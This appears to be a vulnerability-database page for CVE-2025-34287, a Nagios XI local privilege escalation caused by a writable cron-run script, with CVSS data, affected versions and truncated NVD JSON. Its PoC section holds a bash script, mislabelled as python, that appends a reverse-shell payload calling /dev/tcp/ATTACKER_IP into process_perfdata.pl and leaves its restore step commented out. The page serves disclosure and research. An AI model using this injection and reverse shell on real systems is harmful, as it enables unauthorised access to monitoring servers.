CVE-2025-34287

Description

Nagios XI versions prior to 2024R2 contain an improperly owned script, process_perfdata.pl, which is executed periodically as the nagios user but owned by www-data. Because the file was writable by www-data, an attacker with web server privileges could modify its contents, leading to arbitrary code execution as the nagios user when the script is next run. This improper ownership and permission configuration enables local privilege escalation.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:* - VULNERABLE

Nagios XI < 2024R2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-34287 PoC - Nagios XI Local Privilege Escalation
# Modify process_perfdata.pl to execute arbitrary code as nagios user

TARGET_SCRIPT="/usr/local/nagiosxi/scripts/process_perfdata.pl"
BACKUP_FILE="/tmp/process_perfdata.pl.bak"

# Check if we have write access to the target script
if [ ! -w "$TARGET_SCRIPT" ]; then
    echo "[-] No write access to $TARGET_SCRIPT"
    exit 1
fi

echo "[+] Backing up original script..."
cp "$TARGET_SCRIPT" "$BACKUP_FILE"

echo "[+] Injecting malicious code into process_perfdata.pl..."
# Inject a reverse shell payload that connects back to attacker
cat >> "$TARGET_SCRIPT" << 'EOF'

# CVE-2025-34287 - Malicious injection
if (-e "/tmp/.exploit_trigger") {
    system("bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1");
    unlink("/tmp/.exploit_trigger");
}
EOF

echo "[+] Creating trigger file..."
touch "/tmp/.exploit_trigger"

echo "[+] Waiting for cron job to execute the script..."
echo "[*] The next scheduled execution will trigger the payload as nagios user"

echo "[+] Cleanup: Restore original script"
# cp "$BACKUP_FILE" "$TARGET_SCRIPT"
# rm "$BACKUP_FILE"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34287
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34287
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34287/
[4] VulDB https://vuldb.com/cve/CVE-2025-34287
[5] https://www.nagios.com/changelog/nagios-xi/
[6] https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-improperly-owned-script

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34287", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:49.080", "lastModified": "2025-11-06T18:12:41.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2024R2 contain an improperly owned script, process_perfdata.pl, which is executed periodically as the nagios user but owned by www-data. Because the file was writable by www-data, an attacker with web server privileges could modify its contents, leading to arbitrary code execution as the nagios user when the script is next run. This improper ownership and permission configuration enables local privilege escalation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "62CF7BF4-6AAA-443E-93B4-B2F080091C13"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "85F1764D-1DD8-44B0-BF5A-2420CB519A3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "C1FE1A0B-78D1-4626-A4CD-21B843DA596E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "CCAB888E-F030-4640-9A18-9E423E553308"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "C648B0A4-053C-4884-8A37-4AF03053ED1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.1:*:*:*:*:*:*", "matchCriteriaId": "893EEA99-0096-4C9F-BA8A-246A3E3F6C15"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.2:*:*:*:*:*:*", "matchCriteriaId": "A1FDA3F3-DF79-4807-9451-F04B2DB9A2B6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.3:*:*:*:*:*:*", "matchCriteriaId": "9E055065-35A7-458A-A2DB-26634B97EE7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.4:*:*:*:*:*:*", "matchCriteriaId": "76946B2D-093C-4981-8465-5ADBB98C0676"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.5:*:*:*:*:*:*", "matchCriteriaId": "E9112876-7C61-4A72-8F91-023378E82E6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.2:*:*:*:*:*:*", "matchCriteriaId": "1443759F-EBD7-4366-A5D3-9FB15CE15B40"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.2.1:*:*:*:*:*:*", "matchCriteriaId": "F85D8CA4-F1AC-4538-925C-1AD00FF7B9C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.2.2:*:*:*:*:*:*", "matchCriteriaId": "7FFC081E-728A-4643-A8DF-5CC8E94E7D78"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.3:*:*:*:*:*:*", "matchCriteriaId": "C3D8A858-2F40-4568-BCA0-59CF6033A ... (truncated)